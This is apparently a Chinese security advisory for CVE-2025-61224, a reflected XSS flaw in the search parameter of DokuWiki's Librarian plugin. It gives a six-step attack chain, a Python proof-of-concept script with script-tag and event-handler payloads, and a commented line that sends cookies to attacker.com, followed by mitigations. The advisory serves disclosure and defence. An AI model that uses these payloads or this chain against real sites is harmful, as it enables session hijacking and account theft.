CVE-2025-61224：DokuWiki Librarian插件XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61224

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

DokuWiki Librarian插件

漏洞概述

CVE-2025-61224是DokuWiki内容管理系统的Librarian插件中存在的一个跨站脚本（Cross Site Scripting, XSS）漏洞。该漏洞影响DokuWiki 2025-05-14a 'Librarian'[56.1]版本，允许远程攻击者通过精心构造的请求在目标系统中执行任意代码。

DokuWiki是一款流行的开源Wiki软件，广泛应用于企业内部知识管理、团队协作和文档编写等场景。其Librarian插件用于提供图书馆或文档管理功能，允许用户搜索、浏览和组织文档资源。由于该插件在处理用户输入时缺乏充分的安全过滤和输出编码，导致恶意脚本可以被注入到页面中并在受害者的浏览器中执行。

根据CVSS 3.1评分标准，该漏洞评分为6.5分，属于中等严重级别。攻击者无需认证即可发起攻击，但需要用户交互（如点击恶意链接或访问恶意页面）才能触发漏洞利用。漏洞对机密性影响为高（攻击者可窃取用户会话、Cookie等敏感信息），但对完整性和可用性无直接影响。该漏洞已于2025年10月6日公开披露，由MITRE组织记录，相关参考链接包括DokuWiki官方GitHub仓库的Issue #4512。

技术细节

该漏洞存在于DokuWiki Librarian插件的搜索功能中，具体位于q参数（查询参数）的处理逻辑中。当用户使用Librarian插件的搜索功能时，插件会将用户提交的q参数值直接嵌入到HTML页面中进行显示，而未对其进行充分的HTML实体编码或过滤处理。

从技术原理来看，XSS漏洞的产生主要源于以下两个方面：

1. 输入验证缺失：插件未对q参数中的特殊字符（如<、>、"、'、&等）进行转义或过滤，攻击者可以注入任意HTML标签和JavaScript代码。

2. 输出编码缺失：在将q参数的值回显到HTML页面时，插件未使用适当的上下文编码（如HTML实体编码），导致恶意脚本能够直接在浏览器中解析执行。

攻击者可以通过构造包含恶意JavaScript代码的URL（如在q参数中注入<script>alert(document.cookie)</script>），诱导已登录的用户点击该链接。当用户在DokuWiki站点上访问搜索功能并提交恶意查询时，注入的脚本将在受害者的浏览器上下文中执行，从而实现会话劫持、Cookie窃取、钓鱼攻击或进一步的内网渗透。

由于该漏洞需要用户交互（UI:R），攻击者通常需要通过社会工程学手段（如发送钓鱼邮件、在论坛中发布恶意链接等）来诱骗受害者点击。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），这使得该漏洞具有较高的可利用性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具识别运行DokuWiki 2025-05-14a版本且安装了Librarian插件的目标网站，并确认其搜索功能可访问。

STEP 2

步骤2：漏洞验证

攻击者构造包含恶意JavaScript代码的URL，将payload注入到q参数中（如?q=<script>alert(1)</script>），验证目标是否存在反射型XSS漏洞。

STEP 3

步骤3：构造恶意链接

攻击者将包含恶意payload的URL进行URL编码或缩短处理，伪装成正常链接，准备通过钓鱼邮件、社交媒体或论坛等方式传播。

STEP 4

步骤4：诱导用户点击

攻击者通过社会工程学手段（如伪装成DokuWiki站内通知、搜索结果链接等）诱骗已登录的目标用户点击恶意链接。

STEP 5

步骤5：执行恶意脚本

用户在已认证的DokuWiki会话中点击恶意链接后，注入的JavaScript代码在受害者浏览器中执行，可窃取会话Cookie、进行钓鱼攻击或执行其他恶意操作。

STEP 6

步骤6：数据窃取与权限提升

攻击者利用窃取的会话Cookie劫持用户账户，根据用户权限级别获取敏感文档、修改内容或进一步渗透系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61224 - DokuWiki Librarian Plugin XSS PoC
# Vulnerability: Reflected XSS via 'q' parameter in Librarian plugin search functionality
# Affected: DokuWiki 2025-05-14a 'Librarian'[56.1]

import requests
import sys

TARGET_URL = "http://target-dokuwiki-site.com/lib/exe/librarian.php"

def exploit_xss(target_url, payload):
    """
    Exploit reflected XSS vulnerability in DokuWiki Librarian plugin
    via the 'q' (query) parameter.
    """
    params = {
        "q": payload
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        # Check if the payload is reflected in the response without sanitization
        if payload in response.text:
            print(f"[+] XSS payload reflected successfully!")
            print(f"[+] Full URL: {response.url}")
            return True
        else:
            print("[-] Payload not found in response (may be sanitized)")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    # Basic XSS payload - cookie stealing demonstration
    xss_payload = '<script>alert(document.cookie)</script>'

    # Advanced payload for session hijacking
    # xss_payload = '<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>'

    # Event-based payload (alternative vector)
    # xss_payload = '" onmouseover="alert(document.cookie)" x="'

    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Payload: {xss_payload}")
    exploit_xss(TARGET_URL, xss_payload)

影响范围

DokuWiki 2025-05-14a 'Librarian'[56.1]

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web服务器层面配置URL过滤规则，阻止包含可疑JavaScript代码特征的q参数请求；2）部署WAF规则，对常见的XSS payload（如<script>、onerror=、onload=等关键字）进行拦截；3）通过Content Security Policy（CSP）头部限制页面脚本执行，降低XSS攻击的影响；4）为所有用户会话Cookie添加HttpOnly标志，防止脚本窃取会话；5）提醒用户不要点击来源不明的链接，特别是在Wiki站内搜索相关的可疑URL；6）监控异常的用户会话活动，及时发现可能的攻击行为。